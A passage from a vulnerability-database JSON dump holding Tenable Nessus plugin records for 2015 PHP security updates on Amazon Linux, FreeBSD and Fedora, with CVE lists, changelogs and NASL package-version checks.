(rpm_check(release:\"ALA\", reference:\"php54-gd-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-imap-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-intl-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-ldap-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mbstring-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mcrypt-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mssql-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysql-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysqlnd-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-odbc-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pdo-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pgsql-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-process-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pspell-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-recode-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-snmp-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-soap-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-tidy-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xml-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xmlrpc-5.4.45-1.75.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php54 / php54-bcmath / php54-cli / php54-common / php54-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:39", "description": "PHP reports :\n\n- Core :\n\n- Fixed bug #70172 (Use After Free Vulnerability in unserialize()).\n\n- Fixed bug #70219 (Use after free vulnerability in session deserializer).\n\n- EXIF :\n\n- Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes).\n\n- hash :\n\n- Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n\n- PCRE :\n\n- Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions).\n\n- SOAP :\n\n- Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE).\n\n- SPL :\n\n- Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage).\n\n- Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList).\n\n- XSLT :\n\n- Fixed bug #69782 (NULL pointer dereference).\n\n- ZIP :\n\n- Fixed bug #70350 (ZipArchive::extractTo allows for directory traversal when creating directories).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-09T00:00:00", "type": "nessus", "title": "FreeBSD : php -- multiple vulnerabilities (3d675519-5654-11e5-9ad8-14dae9d210b8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php5-soap", "p-cpe:/a:freebsd:freebsd:php5-xsl", "p-cpe:/a:freebsd:freebsd:php55", "p-cpe:/a:freebsd:freebsd:php55-soap", "p-cpe:/a:freebsd:freebsd:php55-xsl", "p-cpe:/a:freebsd:freebsd:php56", "p-cpe:/a:freebsd:freebsd:php56-soap", "p-cpe:/a:freebsd:freebsd:php56-xsl", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3D675519565411E59AD814DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/85859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85859);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (3d675519-5654-11e5-9ad8-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP reports :\n\n- Core :\n\n- Fixed bug #70172 (Use After Free Vulnerability in unserialize()).\n\n- Fixed bug #70219 (Use after free vulnerability in session\ndeserializer).\n\n- EXIF :\n\n- Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD\ntag byte value of 32 bytes).\n\n- hash :\n\n- Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n\n- PCRE :\n\n- Fixed bug #70345 (Multiple vulnerabilities related to PCRE\nfunctions).\n\n- SOAP :\n\n- Fixed bug #70388 (SOAP serialize_function_call() type confusion /\nRCE).\n\n- SPL :\n\n- Fixed bug #70365 (Use-after-free vulnerability in unserialize() with\nSplObjectStorage).\n\n- Fixed bug #70366 (Use-after-free vulnerability in unserialize() with\nSplDoublyLinkedList).\n\n- XSLT :\n\n- Fixed bug #69782 (NULL pointer dereference).\n\n- ZIP :\n\n- Fixed bug #70350 (ZipArchive::extractTo allows for directory\ntraversal when creating directories).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.4.45\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.5.29\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.6.13\"\n );\n # https://vuxml.freebsd.org/freebsd/3d675519-5654-11e5-9ad8-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27403633\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.4.45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-soap<5.4.45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-xsl<5.4.45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55<5.5.29\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-soap<5.5.29\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-xsl<5.5.29\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56<5.6.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-soap<5.6.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-xsl<5.6.13\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:25", "description": "03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long timeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST data). (cmb) * Fixed bug #70198 (Checking liveness does not work as expected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use After Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219 (Use after free vulnerability in session deserializer). (taoguangchen at icloud dot com) **CLI server:** * Fixed bug #66606 (Sets HTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug #70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug #70266 (DateInterval::__construct.interval_spec is not supposed to be optional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring text after null byte). (cmb) **EXIF:** * Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes). (Stas) **hash:** * Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232 (Incorrect bump-along behavior with \\K and empty string match). (cmb) * Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions). (Anatol Belski) **SOAP:** * Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref (segfault) in spl_autoload via ob_start). (hugh at allthethings dot co dot nz) * Fixed bug #70303 (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage). (taoguangchen at icloud dot com) * Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails for very large and very small WBMP). (cmb) * Fixed bug #70157 (parse_ini_string() segmentation fault with INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782 (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-15T00:00:00", "type": "nessus", "title": "Fedora 21 : php-5.6.13-1.fc21 (2015-14976)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-14976.NASL", "href": "https://www.tenable.com/plugins/nessus/85933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-14976.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85933);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"FEDORA\", value:\"2015-14976\");\n\n script_name(english:\"Fedora 21 : php-5.6.13-1.fc21 (2015-14976)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long\ntimeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST\ndata). (cmb) * Fixed bug #70198 (Checking liveness does not work as\nexpected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use\nAfter Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219\n(Use after free vulnerability in session deserializer). (taoguangchen\nat icloud dot com) **CLI server:** * Fixed bug #66606 (Sets\nHTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug\n#70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug\n#70266 (DateInterval::__construct.interval_spec is not supposed to be\noptional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring\n text after null byte). (cmb) **EXIF:** * Fixed bug\n #70385 (Buffer over-read in exif_read_data with TIFF IFD\n tag byte value of 32 bytes). (Stas) **hash:** * Fixed\n bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug\n #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and\n do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232\n (Incorrect bump-along behavior with \\K and empty string\n match). (cmb) * Fixed bug #70345 (Multiple\n vulnerabilities related to PCRE functions). (Anatol\n Belski) **SOAP:** * Fixed bug #70388 (SOAP\n serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref\n (segfault) in spl_autoload via ob_start). (hugh at\n allthethings dot co dot nz) * Fixed bug #70303\n (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability\n in unserialize() with SplObjectStorage). (taoguangchen\n at icloud dot com) * Fixed bug #70366 (Use-after-free\n vulnerability in unserialize() with\n SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails\n for very large and very small WBMP). (cmb) * Fixed bug\n #70157 (parse_ini_string() segmentation fault with\n INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782\n (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260748\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166337.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3071c07f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"php-5.6.13-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:28", "description": "03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long timeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST data). (cmb) * Fixed bug #70198 (Checking liveness does not work as expected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use After Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219 (Use after free vulnerability in session deserializer). (taoguangchen at icloud dot com) **CLI server:** * Fixed bug #66606 (Sets HTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug #70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug #70266 (DateInterval::__construct.interval_spec is not supposed to be optional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring text after null byte). (cmb) **EXIF:** * Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes). (Stas) **hash:** * Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232 (Incorrect bump-along behavior with \\K and empty string match). (cmb) * Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions). (Anatol Belski) **SOAP:** * Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref (segfault) in spl_autoload via ob_start). (hugh at allthethings dot co dot nz) * Fixed bug #70303 (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage). (taoguangchen at icloud dot com) * Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails for very large and very small WBMP). (cmb) * Fixed bug #70157 (parse_ini_string() segmentation fault with INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782 (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-15T00:00:00", "type": "nessus", "title": "Fedora 22 : php-5.6.13-1.fc22 (2015-14977)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-14977.NASL", "href": "https://www.tenable.com/plugins/nessus/85934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-14977.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85934);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"FEDORA\", value:\"2015-14977\");\n\n script_name(english:\"Fedora 22 : php-5.6.13-1.fc22 (2015-14977)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long\ntimeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST\ndata). (cmb) * Fixed bug #70198 (Checking liveness does not work as\nexpected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use\nAfter Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219\n(Use after free vulnerability in session deserializer). (taoguangchen\nat icloud dot com) **CLI server:** * Fixed bug #66606 (Sets\nHTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug\n#70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug\n#70266 (DateInterval::__construct.interval_spec is not supposed to be\noptional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring\n text after null byte). (cmb) **EXIF:** * Fixed bug\n #70385 (Buffer over-read in exif_read_data with TIFF IFD\n tag byte value of 32 bytes). (Stas) **hash:** * Fixed\n bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug\n #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and\n do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232\n (Incorrect bump-along behavior with \\K and empty string\n match). (cmb) * Fixed bug #70345 (Multiple\n vulnerabilities related to PCRE functions). (Anatol\n Belski) **SOAP:** * Fixed bug #70388 (SOAP\n serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref\n (segfault) in spl_autoload via ob_start). (hugh at\n allthethings dot co dot nz) * Fixed bug #70303\n (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability\n in unserialize() with SplObjectStorage). (taoguangchen\n at icloud dot com) * Fixed bug #70366 (Use-after-free\n vulnerability in unserialize() with\n SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails\n for very large and very small WBMP). (cmb) * Fixed bug\n #70157 (parse_ini_string() segmentation fault with\n INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782\n (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 